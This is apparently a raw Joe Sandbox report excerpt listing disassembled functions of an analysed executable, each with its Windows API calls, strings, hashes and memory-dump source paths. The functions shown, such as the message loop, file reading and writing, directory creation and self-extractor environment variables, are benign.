GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FBB58A
IsDialogMessageW.USER32(00010416,?), ref: 00FBB59E
TranslateMessage.USER32(?), ref: 00FBB5AC
DispatchMessageW.USER32(?), ref: 00FBB5B6

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 6b337f5cfb64b70356a24c7f97405a94675e5c8352095da98ae5fc768b44b0a3
Instruction ID: 571190efd6e472f02562901baaa0757da3804ed226fc9db5a54917ffe06719aa
Opcode Fuzzy Hash: 6b337f5cfb64b70356a24c7f97405a94675e5c8352095da98ae5fc768b44b0a3
Instruction Fuzzy Hash: 19F0BD71E0211AABCB31EBE6AC4CDDB7FBCEE052A1B044415B549D6044EB78D505CBB1

Function 00FBABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00FBABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 00FBABF9

Part of subcall function 00FB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00FAC116,00000000,.exe,?,?,00000800,?,?,?,00FB8E3C), ref: 00FB1FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00FBABE9

Strings

EDIT, xrefs: 00FBABCD, 00FBABD8, 00FBABE5

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 64c7aada73f2d981c6676e0e57ec00b56abc82021673a345a3d85b9726aea05d
Instruction ID: 55b1fb9f6302c593990814e9fd700234305a1604786f909591c5ada06e950907
Opcode Fuzzy Hash: 64c7aada73f2d981c6676e0e57ec00b56abc82021673a345a3d85b9726aea05d
Instruction Fuzzy Hash: DAF02732B012287BDB3197359C09FDB726CAF82B50F488012BA44F71C4D766ED41DAB6

Function 00FBDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00FBDBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00FBDC30

Strings

sfxcmd, xrefs: 00FBDBEF
sfxpar, xrefs: 00FBDC2B

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 419218154deef2af31a404891548d6c44c731ea0aa39b6ec2dc8c4f0aa9f9583
Instruction ID: d285dbc0a1e46669a704ef4e6976ccd08112d17fbde9d203e49dd805317f1a22
Opcode Fuzzy Hash: 419218154deef2af31a404891548d6c44c731ea0aa39b6ec2dc8c4f0aa9f9583
Instruction Fuzzy Hash: 3EF0ECF2805239A7CB202F968C06FFB3F9DAF05B91B040412BD8595151E6B4C940FEB2

Function 00FA9785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00FA9795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00FA97AD
GetLastError.KERNEL32 ref: 00FA97DF
GetLastError.KERNEL32 ref: 00FA97FE

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 1063551293827f25e5b0bb6623dfe1816603826ac1ed7df405f144970469d047
Instruction ID: 54822142ebeca13da143ceaf27076150a96bdfc16d99fb0552cd478d5cd1868a
Opcode Fuzzy Hash: 1063551293827f25e5b0bb6623dfe1816603826ac1ed7df405f144970469d047
Instruction Fuzzy Hash: A11170B5918204EBDF205F64C80466937A9BF43734F60863AE51685190D7F89E44FB62

Function 00FCAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00FC3F73,00000000,00000000,?,00FCACDB,00FC3F73,00000000,00000000,00000000,?,00FCAED8,00000006,FlsSetValue), ref: 00FCAD66
GetLastError.KERNEL32(?,00FCACDB,00FC3F73,00000000,00000000,00000000,?,00FCAED8,00000006,FlsSetValue,00FD7970,FlsSetValue,00000000,00000364,?,00FC98B7), ref: 00FCAD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00FCACDB,00FC3F73,00000000,00000000,00000000,?,00FCAED8,00000006,FlsSetValue,00FD7970,FlsSetValue,00000000), ref: 00FCAD80

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: d4d98372e1032fb8a737b2cc1234c7925246a2ce14b74f350ec693b2491464a2
Instruction ID: fee06f08bf0fdc1125fca914dc1aa03b4eee83faf4c996c18998d1f79e4d9de0
Opcode Fuzzy Hash: d4d98372e1032fb8a737b2cc1234c7925246a2ce14b74f350ec693b2491464a2
Instruction Fuzzy Hash: C4014732A0222FABC7314B78AC49F577B58EF00BB77100229F907D3650DB21EC01A6E2

Function 00FA9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,00FAD343,00000001,?,?,?,00000000,00FB551D,?,?,?), ref: 00FA9F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00FB551D,?,?,?,?,?,00FB4FC7,?), ref: 00FA9FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00FAD343,00000001,?,?), ref: 00FAA011

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 6c53e5b88285ff914f61521783d92017971d804102a4b8b2a1c8923169c576dd
Instruction ID: 1c1548c3efc60d60601217535d5d1ba1fc12d9f2402c674a039ea5dc087bf513
Opcode Fuzzy Hash: 6c53e5b88285ff914f61521783d92017971d804102a4b8b2a1c8923169c576dd
Instruction Fuzzy Hash: A531F3B2608305AFDB14CF20D808B6E77A6FF86725F04452DF98197290C775AD48EBA3

Function 00FAA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00FAC27E: _wcslen.LIBCMT ref: 00FAC284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00FAA175,?,00000001,00000000,?,?), ref: 00FAA2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00FAA175,?,00000001,00000000,?,?), ref: 00FAA30C
GetLastError.KERNEL32(?,?,?,?,00FAA175,?,00000001,00000000,?,?), ref: 00FAA329

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 213f0d88e8fef07f7c11b0e4cdb1676d49090c83539df82a6a71b5229e2bddb3
Instruction ID: a902cf846fc8f65dec64cb7ad651c783553dd07dfec231c95189cedf6fbfc672
Opcode Fuzzy Hash: 213f0d88e8fef07f7c11b0e4cdb1676d49090c83539df82a6a71b5229e2bddb3
Instruction Fuzzy Hash: E3014CB19003146AEF31AB714C09BFD37889F0B791F044419FA02D2085D75ACA89F6B3

Function 00FCB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00FCB8B8

Strings

, xrefs: 00FCB8FD

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 22d01e4015a1dec92a2ace1f3f56dbe923b7d7b6fb9f42f131ae04ec47aed738
Instruction ID: d4139922c1d7ed6fc55d3702e67c6df8a63217a5b60880c1465857835a08e967
Opcode Fuzzy Hash: 22d01e4015a1dec92a2ace1f3f56dbe923b7d7b6fb9f42f131ae04ec47aed738
Instruction Fuzzy Hash: 7141467590428D9ADF218E248D86FE6BBAAEB45304F1404ECE6DA86142D334AA45AF60

Function 00FCAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00FCAFDD

Strings

LCMapStringEx, xrefs: 00FCAF7D, 00FCAF87

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 5fbca3b3f29d3edf2be3471ff4f5b6b7c20c0eeb56f8c3940190c1a15795eb55
Instruction ID: 652835e0e476f877afdc59f6d591a74669b359713edf3cc1c46158e2ae228178
Opcode Fuzzy Hash: 5fbca3b3f29d3edf2be3471ff4f5b6b7c20c0eeb56f8c3940190c1a15795eb55
Instruction Fuzzy Hash: 3A01173250520EBBCF02AFA0DD06EEE7F62EB48754F05415AFE1426260C676D931FB82

Function 00FCAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00FCA56F), ref: 00FCAF55

Strings

InitializeCriticalSectionEx, xrefs: 00FCAF1B, 00FCAF25

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 7352db4300ae4bf74a2c14d25487376dc8e84ff1d7e5ef2b09012e4b52f2bd84
Instruction ID: e01588ce838a0abaab9141db870723dfa49acca8390b9e0b80cd1f6e8c4ce4be
Opcode Fuzzy Hash: 7352db4300ae4bf74a2c14d25487376dc8e84ff1d7e5ef2b09012e4b52f2bd84
Instruction Fuzzy Hash: D5F0B432A4621DBBCB026F60CC16D9D7F62EF04711B40416AFD085A260EA319A10FB87

Function 00FCADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00FCADEE

Strings

FlsAlloc, xrefs: 00FCADC0, 00FCADCA

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: e2a7d0a369c1e31de1b52b3158bd3370fa5f5d3b13ecd8fd2b0e90a3138282b3
Instruction ID: 3f5e1bef92dd3e96cb37aeb6c5fb334c2e74509ad94f45d80424a21e72843b09
Opcode Fuzzy Hash: e2a7d0a369c1e31de1b52b3158bd3370fa5f5d3b13ecd8fd2b0e90a3138282b3
Instruction Fuzzy Hash: 9AE05532A8231E7BC300BB76CC13E6EBB52DB04722B40019AF8059B340DD30AE00B6CB

Function 00FBEAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBEAF9

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Strings

3Ro, xrefs: 00FBEAE7, 00FBEAF3

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Ro
API String ID: 1269201914-1492261280
Opcode ID: 6babbe7c3582b000bdf2ad34aa7680896850fbc8a6f0c60f1f0d58ea5bdebfdd
Instruction ID: 382b9aab1179d0140cfb3ec6b384ef699ac54f20b6235689fac4342063c94317
Opcode Fuzzy Hash: 6babbe7c3582b000bdf2ad34aa7680896850fbc8a6f0c60f1f0d58ea5bdebfdd
Instruction Fuzzy Hash: 27B012C729B4437C3405A2035E02CFB050EE4C0B90330801FF504C80C1DC84CC013CB2

Function 00FCBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00FCB7BB: GetOEMCP.KERNEL32(00000000), ref: 00FCB7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00FCBA89,?,00000000), ref: 00FCBC64
GetCPInfo.KERNEL32(00000000,00FCBA89,?,?,?,00FCBA89,?,00000000), ref: 00FCBC77

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 85801d7e782b82d44534b78fb312fb7356407cee3f416192737fa75987a7d2a6
Instruction ID: fe28e11bae46865d1da9c9a3622e7b1df2e8af611067cd454301a831df9d7bd7
Opcode Fuzzy Hash: 85801d7e782b82d44534b78fb312fb7356407cee3f416192737fa75987a7d2a6
Instruction Fuzzy Hash: AC515778E002079EDB20DF75CA83FBABBE5EF41320F14406ED4968B251D7399946EB91

Function 00FA9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00FA9A50,?,?,00000000,?,?,00FA8CBC,?), ref: 00FA9BAB
GetLastError.KERNEL32(?,00000000,00FA8411,-00009570,00000000,000007F3), ref: 00FA9BB6

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: c0d0395103af6e830c750579d63b96d932c69fe9d2cd6c37fd06df230f04a61c
Instruction ID: 0a182884b0b3b3d117a754e11b3c9e2448a92d705812e7897b437ae7736ad9af
Opcode Fuzzy Hash: c0d0395103af6e830c750579d63b96d932c69fe9d2cd6c37fd06df230f04a61c
Instruction Fuzzy Hash: 9C4104B59083018FDB24CF24D54456AB7E5FFD6360F14893EE89283260D7F4EE04AA61

Function 00FCBA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00FC97E5: GetLastError.KERNEL32(?,00FE1030,00FC4674,00FE1030,?,?,00FC3F73,00000050,?,00FE1030,00000200), ref: 00FC97E9
Part of subcall function 00FC97E5: _free.LIBCMT ref: 00FC981C
Part of subcall function 00FC97E5: SetLastError.KERNEL32(00000000,?,00FE1030,00000200), ref: 00FC985D
Part of subcall function 00FC97E5: _abort.LIBCMT ref: 00FC9863

Part of subcall function 00FCBB4E: _abort.LIBCMT ref: 00FCBB80
Part of subcall function 00FCBB4E: _free.LIBCMT ref: 00FCBBB4

Part of subcall function 00FCB7BB: GetOEMCP.KERNEL32(00000000), ref: 00FCB7E6

_free.LIBCMT ref: 00FCBA9F
_free.LIBCMT ref: 00FCBAD5

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 1324d4322fef89ae7ceefa914901041d763643dd23a4ea46a6b36dfa7280803e
Instruction ID: dfa8b0a86842b0adad95cb16c152bb58adfdf4c2e8133da48fdb097ce091d2db
Opcode Fuzzy Hash: 1324d4322fef89ae7ceefa914901041d763643dd23a4ea46a6b36dfa7280803e
Instruction Fuzzy Hash: 8331A435D0410BAFDB10EBA8DA43F9977E5EF40320F25409EE8449B2A2EB7A5D41FB50

Function 00FA1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FA1E55

Part of subcall function 00FA3BBA: __EH_prolog.LIBCMT ref: 00FA3BBF

_wcslen.LIBCMT ref: 00FA1EFD

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: f6cdd30ba41e3c53b9319bb0298e15f4a4d17e6b944398857a25b12267ecf5c6
Instruction ID: 0681706a2dbc92f3ff57fc922f26092bf5011e90587854856f77756750f6ffca
Opcode Fuzzy Hash: f6cdd30ba41e3c53b9319bb0298e15f4a4d17e6b944398857a25b12267ecf5c6
Instruction Fuzzy Hash: 37316AB1904209AFCF11DF99C955AEEBBF6BF49310F114069E845A7251C73A5E00EF60

Function 00FA9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00FA73BC,?,?,?,00000000), ref: 00FA9DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00FA9E70

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

